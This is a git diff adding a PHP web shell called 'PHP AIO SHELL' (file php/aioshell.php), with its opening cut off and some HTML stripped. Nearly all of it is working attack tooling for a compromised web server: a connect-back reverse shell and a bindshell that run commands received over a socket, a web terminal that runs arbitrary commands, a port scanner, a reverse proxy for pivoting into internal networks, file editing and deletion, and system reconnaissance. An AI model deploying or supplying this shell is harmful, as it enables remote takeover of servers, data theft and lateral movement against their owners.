diff --git a/php/aioshell.php b/php/aioshell.php
new file mode 100644
index 0000000..4f44db4
--- /dev/null
+++ b/php/aioshell.php
@@ -0,0 +1,1204 @@
+';
+ $fp=@fopen($file_name, "r");
+ $data=@fread($fp, filesize($file_name));
+
+ echo '
+
+ ';
+ }
+ else {
+ $fp=@fopen($file_name, "w+");
+ $result=@fwrite($fp, $_POST['newcontent']);
+ @fclose($fp);
+ if ($result == false) {
+ echo "edit failed.";
+ }
+ else {
+ echo "edit ok.";
+ }
+ }
+}
+function rename_file($old_file_name, $new_file_name)
+{
+ if (file_exists($old_file_name) == false) {
+ echo "file $old_file_name not exist.\n";
+ return -1;
+ }
+ if (rename($old_file_name, $new_file_name) == false) {
+ echo "rename $old_file_name to $new_file_name failed.\n";
+ return -1;
+ }
+ echo "rename $old_file_name to $new_file_name ok.\n";
+ return 0;
+}
+function get_human_size($bytes)
+{
+ $type=array("Bytes", "KB", "MB", "GB", "TB");
+ $idx=0;
+ while ($bytes >= 1024) {
+ $bytes /= 1024;
+ $idx++;
+ }
+ return (intval($bytes)." ".$type[$idx]);
+}
+function get_file_perms($file_name)
+{
+ return (substr(sprintf('%o', fileperms($file_name)), -4));
+}
+function get_human_file_perms($file_name)
+{
+ $perms = fileperms($file_name);
+ if (($perms & 0xC000) == 0xC000) {
+ $info = 's';
+ } elseif (($perms & 0xA000) == 0xA000) {
+ $info = 'l';
+ } elseif (($perms & 0x8000) == 0x8000) {
+ $info = '-';
+ } elseif (($perms & 0x6000) == 0x6000) {
+ $info = 'b';
+ } elseif (($perms & 0x4000) == 0x4000) {
+ $info = 'd';
+ } elseif (($perms & 0x2000) == 0x2000) {
+ $info = 'c';
+ } elseif (($perms & 0x1000) == 0x1000) {
+ $info = 'p';
+ } else {
+ $info = 'u';
+ }
+ $info .= (($perms & 0x0100) ? 'r' : '-');
+ $info .= (($perms & 0x0080) ? 'w' : '-');
+ $info .= (($perms & 0x0040) ?
+ (($perms & 0x0800) ? 's' : 'x' ) :
+ (($perms & 0x0800) ? 'S' : '-'));
+ $info .= (($perms & 0x0020) ? 'r' : '-');
+ $info .= (($perms & 0x0010) ? 'w' : '-');
+ $info .= (($perms & 0x0008) ?
+ (($perms & 0x0400) ? 's' : 'x' ) :
+ (($perms & 0x0400) ? 'S' : '-'));
+ $info .= (($perms & 0x0004) ? 'r' : '-');
+ $info .= (($perms & 0x0002) ? 'w' : '-');
+ $info .= (($perms & 0x0001) ?
+ (($perms & 0x0200) ? 't' : 'x' ) :
+ (($perms & 0x0200) ? 'T' : '-'));
+ return $info;
+}
+function get_file_owner($file_name)
+{
+ $uid=fileowner($file_name);
+ $user_info = posix_getpwuid($uid);
+ return $user_info['name'];
+}
+function read_dir($dir_path)
+{
+ if (is_dir($dir_path)) {
+ if (($dp = opendir($dir_path)) == false) {
+ echo "open $dir_path failed.\n";
+ return -1;
+ }
+ while (($file_name = readdir($dp)) != false) {
+ if ($file_name == "." || $file_name == "..")
+ continue;
+ $sub_path = $dir_path."/".$file_name;
+ echo "$sub_path\n";
+ }
+ }
+ closedir($dp);
+ return 0;
+}
+function read_dirs($dir_path)
+{
+ echo '
+
+
+| Filename |
+Last modified |
+Size |
+Chmod/Perms |
+Action |
+
';
+ if (is_dir($dir_path)) {
+ if (($dp = opendir($dir_path)) == false) {
+ echo "open $dir_path failed.\n";
+ return -1;
+ }
+ while (($file_name = readdir($dp)) != false) {
+ if ($file_name == "." || $file_name == "..")
+ continue;
+ $sub_path = $dir_path."/".$file_name;
+ $last_modify_time=date("Y/m/d H:i:s", fileatime($file_name));
+ $file_size=filesize($file_name);
+ $file_size_string=get_human_size($file_size);
+ $file_perms=get_file_perms($file_name);
+ $file_perms_string=get_human_file_perms($file_name);
+ $file_owner=get_file_owner($file_name);
+
+ echo '
+ | '.$file_name.' |
+ '.$last_modify_time.' |
+ '.$file_size_string.' |
+ '.$file_perms.' / '.$file_perms_string.' / '.$file_owner.' |
+ Delete
+ Edit
+ Download
+ Rename
+ |
+
';
+ }
+ }
+ echo '
';
+ closedir($dp);
+ return 0;
+}
+function aio_directory()
+{
+ $curr_path=getcwd();
+ return read_dirs($curr_path);
+}
+function search_file_by_name($dir_path, $target_file)
+{
+ if (is_dir($dir_path)) {
+ if (($dp = opendir($dir_path)) == false) {
+ echo "open $dir_path failed.\n";
+ return -1;
+ }
+ while (($file_name = readdir($dp)) != false) {
+ if ($file_name == "." || $file_name == "..")
+ continue;
+ $sub_path = $dir_path."/".$file_name;
+ if (is_dir($sub_path)) {
+ search_file_by_name($sub_path, $target_file);
+ }
+ if (!strcmp($file_name, $target_file)) {
+ echo "found $target_file.\n";
+ closedir($dp);
+ return 0;
+ }
+ }
+ echo "not found $target_file.\n";
+ closedir($dp);
+ }
+ return -1;
+}
+/**
+ * show file attribute with cetern flag.
+ *
+ * @dir_path - directroy to search.
+ * @attr_flag - 0 readable.
+ * - 1 writeable.
+ * - 2 executable.
+ */
+function show_attr_file($dir_path, $attr_flag)
+{
+ if (is_dir($dir_path)) {
+ if (($dp = opendir($dir_path)) == false) {
+ echo "open $dir_path failed.\n";
+ return -1;
+ }
+ while (($file_name = readdir($dp)) != false) {
+ if ($file_name == "." || $file_name == "..")
+ continue;
+ $sub_path = $dir_path."/".$file_name;
+ if (is_dir($sub_path)) {
+ show_attr_file($sub_path, $attr_flag);
+ }
+
+ if ($attr_flag == 0) {
+ if (is_readable($file_name))
+ echo "$sub_path\n";
+ }
+ else if ($attr_flag == 1) {
+ if (is_writable($file_name))
+ echo "$sub_path\n";
+ }
+ else if ($attr_flag == 2) {
+ if (is_executable($file_name))
+ echo "$sub_path\n";
+ }
+ else {
+ echo "wrong attribute flag.\n";
+ break;
+ }
+ }
+ closedir($dp);
+ }
+ return 0;
+}
+function create_dir($dir_path)
+{
+ if (file_exists($dir_path))
+ return -1;
+ if (mkdir($dir_path, 0700) == false) {
+ echo "create $dir_path failed.\n";
+ return -1;
+ }
+ echo "create $dir_path ok.\n";
+ return 0;
+}
+function destroy_dir($dir_path)
+{
+ if (file_exists($dir_path) == false)
+ return -1;
+ if (rmdir($dir_path) == false) {
+ echo "delete $dir_path failed.\n";
+ return -1;
+ }
+ echo "delete $dir_path ok.\n";
+ return 0;
+}
+function destroy_dirs($dir_path)
+{
+ if (is_dir($dir_path)) {
+ if (($dp = opendir($dir_path)) == false) {
+ echo "open $dir_path failed.\n";
+ return -1;
+ }
+ while (($file_name = readdir($dp)) != false) {
+ if ($file_name == "." || $file_name == "..")
+ continue;
+ $sub_path = $dir_path."/".$file_name;
+ if (is_dir($sub_path)) {
+ destroy_dirs($sub_path);
+ }
+ else
+ delete_file($sub_path);
+ }
+ closedir($dp);
+ destroy_dir($dir_path);
+ return 0;
+ }
+ return 0;
+}
+function linux_id()
+{
+ $uid = posix_getuid();
+ $user_info = posix_getpwuid($uid);
+ echo "uid=".$uid."(".$user_info['name'].") ";
+ echo "gid=".$user_info['gid']."(".$user_info['name'].") ";
+ echo "dir=".$user_info['dir']." ";
+ echo "shell=".$user_info['shell']."\n";
+}
+function linux_uname()
+{
+ $uname = posix_uname();
+ echo $uname['sysname']." ".$uname['nodename']." ".$uname['release']." ";
+ echo $uname['version']." ".$uname['machine'];
+}
+function get_proc_name($file_name)
+{
+ $fp = fopen($file_name, "r");
+ if ($fp == false) {
+ echo "open $file_name failed.\n";
+ return -1;
+ }
+ while (($buf = fgets($fp, 1024)) != false ) {
+ if (strstr($buf, "Name:") != NULL) {
+ sscanf($buf, "%s %s", $tmp, $name);
+ fclose($fp);
+ return $name;
+ }
+ }
+ fclose($fp);
+ return 0;
+}
+function get_proc_cmd($file_name)
+{
+ $fp = fopen($file_name, "r");
+ if ($fp == false) {
+ echo "open $file_name failed.\n";
+ return -1;
+ }
+ $cmd = fgets($fp, 1024);
+ fclose($fp);
+ return $cmd;
+}
+function linux_ps()
+{
+ if (($dp = opendir("/proc")) == false) {
+ echo "open /proc failed.\n";
+ return -1;
+ }
+ echo "open /proc ok.\n";
+ while (($file_name = readdir($dp)) != false) {
+ if ($file_name == "." || $file_name == "..")
+ continue;
+ if (ctype_digit($file_name) == false)
+ continue;
+
+ $dir_path = "/proc/$file_name/status";
+ $proc_name = get_proc_name($dir_path);
+ $dir_path = "/proc/$file_name/cmdline";
+ $proc_cmd = get_proc_cmd($dir_path);
+ echo $file_name."\t\t".$proc_name." ".$proc_cmd."\n";
+ }
+ closedir($dp);
+ return 0;
+}
+function tcp_connect($host, $port)
+{
+ $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
+ if ($socket == false) {
+ echo "create socket error.\n";
+ return -1;
+ }
+ if (@socket_connect($socket, $host, $port) == false) {
+ socket_close($socket);
+ return -1;
+ }
+ return $socket;
+}
+function tcp_connect_timeout($host, $port, $timeout)
+{
+ $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
+ if ($socket == false) {
+ echo "create socket error.\n";
+ return -1;
+ }
+ if (socket_set_nonblock($socket) == false) {
+ echo "set nonblock error.\n";
+ socket_close($socket);
+ return -1;
+ }
+ $time = time();
+ while (!@socket_connect($socket, $host, $port)) {
+ $err = socket_last_error($socket);
+ if ($err == 115 || $err == 114) {
+ if ((time() - $time) >= $timeout) {
+ socket_close($socket);
+ echo "socket timeout.\n";
+ return -1;
+ }
+ sleep(1);
+ continue;
+ }
+ socket_close($socket);
+ return -1;
+ }
+
+ echo "connect to $host:$port ok.\n";
+ return $socket;
+}
+function run_proxy_client($remote_host1, $remote_port1, $remote_host2, $remote_port2)
+{
+ $socket1 = tcp_connect($remote_host1, $remote_port1);
+ if ($socket1 == -1) {
+ echo "connect to $remote_host1:$remote_port1 failed.\n";
+ return -1;
+ }
+ echo "connect to $remote_host1:$remote_port1 ok.\n";
+ $socket2 = tcp_connect($remote_host2, $remote_port2);
+ if ($socket2 == -1) {
+ echo "connect to $remote_host2:$remote_port2 failed.\n";
+ socket_close($socket1);
+ return -1;
+ }
+ echo "connect to $remote_host2:$remote_port2 ok.\n";
+ run_proxy_core($socket1, $remote_host1, $socket2, $remote_host2);
+ return 0;
+}
+function web_proxy_client()
+{
+ echo '
+
+ Linux reverse proxy
+
+
+ ';
+ if (empty($_POST['intranet_host']) || empty($_POST['intranet_port']) ||
+ empty($_POST['public_host']) || empty($_POST['public_port']))
+ return -1;
+ run_proxy_client($_POST['intranet_host'], $_POST['intranet_port'],
+ $_POST['public_host'], $_POST['public_port']);
+}
+function run_proxy_core($socket1, $remote_host1, $socket2, $remote_host2)
+{
+ while (true) {
+ $read_sockets = array($socket1, $socket2);
+ $write_sockets = NULL;
+ $except_sockets = NULL;
+ if (socket_select($read_sockets, $write_sockets, $except, 0) == -1) {
+ echo "socket_select error ".socket_strerror(socket_last_error())."\n";
+ break;
+ }
+ if (in_array($socket2, $read_sockets)) {
+ //echo "got data from $remote_host2.\n";
+ $bytes2 = socket_recv($socket2, $buf2, 1024, MSG_DONTWAIT);
+ if ($bytes2 == false) {
+ echo "socket_recv ".socket_strerror(socket_last_error($socket2))."\n";
+ break;
+ }
+ //echo "got bytes $bytes2.\n";
+ if ($bytes2 == 0) {
+ echo "recv no data from $remote_host2.\n";
+ break;
+ }
+ $ret2 = socket_send($socket1, $buf2, $bytes2, MSG_EOR);
+ if ($ret2 == false) {
+ echo "socket_send ".socket_strerror(socket_last_error($socket1))."\n";
+ break;
+ }
+ if ($ret2 != $bytes2) {
+ echo "send data failed.\n";
+ break;
+ }
+ //echo "write $ret2 bytes ok.\n";
+ }
+ if (in_array($socket1, $read_sockets)) {
+ //echo "got data from $remote_host1.\n";
+ $bytes1 = socket_recv($socket1, $buf1, 1024, MSG_DONTWAIT);
+ if ($bytes1 == false) {
+ echo "socket_recv ".socket_strerror(socket_last_error($socket1))."\n";
+ break;
+ }
+ //echo "got bytes $bytes1.\n";
+ if ($bytes1 == 0) {
+ echo "recv no data from $remote_host1.\n";
+ break;
+ }
+ $ret1 = socket_send($socket2, $buf1, $bytes1, MSG_EOR);
+ if ($ret1 == false) {
+ echo "socket_send ".socket_strerror(socket_last_error($socket2))."\n";
+ break;
+ }
+ if ($ret1 != $bytes1) {
+ echo "send data failed.\n";
+ break;
+ }
+ //echo "write $ret1 bytes ok.\n";
+ }
+ }
+ echo "proxy done.\n";
+ socket_close($socket1);
+ socket_close($socket2);
+ return 0;
+}
+function init_proxy_server($local_port)
+{
+ $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
+ if ($socket == false) {
+ echo "create socket error.\n";
+ return -1;
+ }
+ if (socket_bind($socket, '0', $local_port) == false) {
+ echo "bind sock error.\n";
+ socket_close($socket);
+ return -1;
+ }
+ if (socket_listen($socket) == false) {
+ echo "listen sock error.\n";
+ socket_close($socket);
+ return -1;
+ }
+ echo "listen on port $local_port ok.\n";
+ return $socket;
+}
+function run_proxy_server($local_port1, $local_port2)
+{
+ $socket1 = init_proxy_server($local_port1);
+ if ($socket1 == -1)
+ return -1;
+ while (true) {
+ if (($newsock1 = socket_accept($socket1)) !== false) {
+ socket_getpeername($newsock1, $ip1);
+ echo "got a client form $ip1\n";
+ break;
+ }
+ }
+ $socket2 = init_proxy_server($local_port2);
+ if ($socket2 == -1)
+ return -1;
+ while (true) {
+ if (($newsock2 = socket_accept($socket2)) !== false) {
+ socket_getpeername($newsock2, $ip2);
+ echo "got a client form $ip2\n";
+ break;
+ }
+ }
+ echo "start transmit data ...\n";
+ run_proxy_core($newsock2, $ip2, $newsock1, $ip1);
+ socket_close($socket2);
+ socket_close($socket1);
+ return 0;
+}
+function tcp_connect_port($host, $port, $timeout)
+{
+ $fp = @fsockopen($host, $port, $errno, $errstr, $timeout);
+
+ return $fp;
+}
+function port_scan_fast($host, $timeout, $banner)
+{
+$general_ports = array(
+ '21'=>'FTP',
+ '22'=>'SSH',
+ '23'=>'Telnet',
+ '25'=>'SMTP',
+ '79'=>'Finger',
+ '80'=>'HTTP',
+ '81'=>'HTTP/Proxy',
+ '110'=>'POP3',
+ '135'=>'MS Netbios',
+ '139'=>'MS Netbios',
+ '143'=>'IMAP',
+ '162'=>'SNMP',
+ '389'=>'LDAP',
+ '443'=>'HTTPS',
+ '445'=>'MS SMB',
+ '873'=>'rsync',
+ '1080'=>'Proxy/HTTP Server',
+ '1433'=>'MS SQL Server',
+ '2433'=>'MS SQL Server Hidden',
+ '1521'=>'Oracle DB Server',
+ '1522'=>'Oracle DB Server',
+ '3128'=>'Squid Cache Server',
+ '3129'=>'Squid Cache Server',
+ '3306'=>'MySQL Server',
+ '3307'=>'MySQL Server',
+ '3500'=>'Squid Cache Server',
+ '3389'=>'MS Terminal Service',
+ '5800'=>'VNC Server',
+ '5900'=>'VNC Server',
+ '8080'=>'Proxy/HTTP Server',
+ '10000'=>'Webmin',
+ '11211'=>'Memcached'
+ );
+ echo '';
+
+ foreach($general_ports as $port=>$name) {
+ if (($fp = tcp_connect_port($host, $port, $timeout)) != false) {
+ if (empty($banner) == false) {
+ $data = fgets($fp, 128);
+ echo '
+ | '.$host.' |
+ '.$port.' |
+ '.$name.' |
+ '.$data.' |
+
';
+ }
+ else {
+ echo '
+ | '.$host.' |
+ '.$port.' |
+ '.$name.' |
+
';
+ }
+ fclose($fp);
+ }
+ }
+ echo '
';
+}
+function port_scan($host, $src_port, $dst_port, $timeout, $banner)
+{
+ echo '
+
+ | Host |
+ Port |
+ State |
+
';
+ for ($port = $src_port; $port <= $dst_port; $port++) {
+ if (($fp = tcp_connect_port($host, $port, $timeout)) != false) {
+ if (empty($banner) == false) {
+ $data = fgets($fp, 128);
+ echo '
+ | '.$host.' |
+ '.$port.' |
+ '.$data.' |
+
';
+ }
+ else {
+ echo '
+ | '.$host.' |
+ '.$port.' |
+ OPEN |
+
';
+ }
+ fclose($fp);
+ }
+ }
+ echo '
';
+}
+function run_portscan()
+{
+ echo '
+
+
+
+
+
+
+ ';
+ if (empty($_POST['scan_host']))
+ return -1;
+
+ if (isset($_POST['scan_fast'])) {
+ port_scan_fast($_POST['scan_host'], $_POST['scan_timeout'],
+ $_POST['scan_banner']);
+ }
+ else {
+ port_scan($_POST['scan_host'], "1", "65535",
+ $_POST['scan_timeout'],
+ $_POST['scan_banner']);
+ }
+}
+function linux_exec($socket, $cmd)
+{
+ $handle = popen($cmd, "r");
+ while (($buf = fgets($handle, 1024)) != false) {
+ $ret = socket_write($socket, $buf, strlen($buf));
+ if ($ret == false) {
+ return -1;
+ }
+ }
+ pclose($handle);
+ return 0;
+}
+function connect_backdoor($host, $port)
+{
+ $banner = "connect back from phpshell\n";
+ $socket = tcp_connect($host, $port);
+ if ($socket == -1) {
+ echo "connect to $host:$port failed.\n";
+ return -1;
+ }
+ echo "connect to $host:$port ok.\n";
+ $ret = socket_write($socket, $banner, strlen($banner));
+ if ($ret == false) {
+ echo "write data failed.\n";
+ socket_close($socket);
+ return -1;
+ }
+ while (true) {
+ $buf = socket_read($socket, 1024);
+ echo $buf;
+ linux_exec($socket, $buf);
+ }
+}
+function bindshell($local_port)
+{
+ $banner = "bindshell from phpshell\n";
+ $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
+ if ($socket == false) {
+ echo "create socket error.\n";
+ return -1;
+ }
+ if (socket_bind($socket, '0', $local_port) == false) {
+ echo "bind sock error.\n";
+ socket_close($socket);
+ return -1;
+ }
+ if (socket_listen($socket) == false) {
+ echo "listen sock error.\n";
+ socket_close($socket);
+ return -1;
+ }
+ echo "listen on port $local_port ok.\n";
+ while (true) {
+ if (($newsock = socket_accept($socket)) !== false) {
+ socket_getpeername($newsock, $ip);
+ echo "got a client form $ip"."
";
+ break;
+ }
+ }
+ $ret = socket_write($newsock, $banner, strlen($banner));
+ if ($ret == false) {
+ echo "write data failed.\n";
+ socket_close($newsock);
+ socket_close($socket);
+ return -1;
+ }
+ while (true) {
+ $buf = socket_read($newsock, 1024);
+ echo $buf;
+ linux_exec($newsock, $buf);
+ }
+ socket_close($newsock);
+ socket_close($socket);
+ return 0;
+}
+function run_backdoor()
+{
+ echo '
+ Linux connect backdoor
+
+
+ Linux bindshell backdoor
+
+ ';
+ if ($_POST['target_host'] && $_POST['target_port']) {
+ connect_backdoor($_POST['target_host'], $_POST['target_port']);
+ }
+ if ($_POST['bind_port']) {
+ bindshell($_POST['bind_port']);
+ }
+}
+/*
+function exec_shell($cmd)
+{
+ $handle = popen($cmd, "r");
+ while (($buf = fgets($handle, 1024)) != false) {
+ echo $buf;
+ }
+ pclose($handle);
+ return 0;
+}
+function run_shell()
+{
+ $host_name = gethostbyaddr($_SERVER['SERVER_NAME']);
+ $uid = posix_getuid();
+ $user_info = posix_getpwuid($uid);
+ echo '
+
+
+
+
+ ';
+ }
+}
+*/
+function run_terminal_shell($cmd)
+{
+ $handle = popen($cmd, "r");
+ while (($buf = fgets($handle, 1024)) != false) {
+ $data .= $buf."";
+ }
+ pclose($handle);
+ return $data;
+}
+function aio_shell()
+{
+ $host_name = gethostbyaddr($_SERVER['SERVER_NAME']);
+ $uid = posix_getuid();
+ $user_info = posix_getpwuid($uid);
+ $curr_path = getcwd();
+ $prompt=$user_info['name'].'@'.$host_name.':'.$curr_path;
+ echo '
+
+
+
+
+
+
+
+ | TERMINAL |
+ '.$prompt.' |
+
+
+
+ | © wzt 2014 http://www.cloud-sec.org |
+
+
+
+';
+}
+function webshell_main()
+{
+ if (isset($_GET['cmd'])) {
+ if ($_GET['cmd'] == "backdoor") {
+ run_backdoor();
+ }
+ if ($_GET['cmd'] == "shell") {
+ aio_shell();
+ }
+ if ($_GET['cmd'] == "portscan") {
+ run_portscan();
+ }
+ if ($_GET['cmd'] == "proxy") {
+ web_proxy_client();
+ }
+ }
+ else {
+ echo '
+
+
+
+ | show directorys |
+ connect backdoor |
+ port scan |
+ reverse proxy |
+ cmd shell |
+
+
+ ';
+ }
+}
+function aio_main()
+{
+ $uid = posix_getuid();
+ $user_info = posix_getpwuid($uid);
+ $uid_banner="uid=".$uid."(".$user_info['name'].") ".
+ "gid=".$user_info['gid']."(".$user_info['name'].") ".
+ "dir=".$user_info['dir']." ".
+ "shell=".$user_info['shell'];
+ $uname = posix_uname();
+ $uname_banner=$uname['sysname']." ".$uname['nodename']." ".$uname['release']." ".
+ $uname['version']." ".$uname['machine'];
+ $server_addr=$_SERVER['SERVER_NAME'];
+ $server_port= $_SERVER['SERVER_PORT'];
+ $server_time=date("Y/m/d h:i:s",time());
+ $phpsoft=$_SERVER['SERVER_SOFTWARE'];
+ $php_version=PHP_VERSION;
+ $zend_version=zend_version();
+ $dis_func=get_cfg_var("disable_functions");
+ $safemode=@ini_get('safe_mode');
+ if ($safemode == false)
+ $safemode="On";
+ $cwd_path=getcwd();
+ $total_disk=disk_total_space("/");
+ $total_disk_gb=intval($total_disk/(1024*1024*1024));
+ $free_disk=disk_free_space("/");
+ $free_disk_gb=intval($free_disk/(1024*1024*1024));
+echo '
+
+
+
+
+PHP AIO SHELL
+
+
+
+| User: '.$uid_banner.' |
+'.$server_time.' |
+
+
+| Uname: '.$uname_banner.' |
+'.$server_addr.":".$server_port.' |
+
+
+
+Software: '.$phpsoft.' | PHP: '.$php_version.' | ZEND: '.$zend_version.'
+ | Safemode: '.$safemode.' | disfunc: '.$dis_func.'
+
+
+
+| Directroy: '.$cwd_path.' |
+Disk: total '.$total_disk_gb.'GB free '.$free_disk_gb.'GB |
+
+
+
+
+
+
+';
+ if ($_GET['cmd']) {
+ if ($_GET['cmd'] == "dir") {
+ aio_directory();
+ }
+ if ($_GET['cmd'] == "backdoor") {
+ run_backdoor();
+ }
+ if ($_GET['cmd'] == "shell") {
+ aio_shell();
+ }
+ if ($_GET['cmd'] == "portscan") {
+ run_portscan();
+ }
+ if ($_GET['cmd'] == "proxy") {
+ web_proxy_client();
+ }
+ }
+ if ($_GET['delete']) {
+ delete_file($_GET['delete']);
+ }
+ if ($_GET['edit']) {
+ edit_file($_GET['edit']);
+ }
+}
+aio_main();
+?>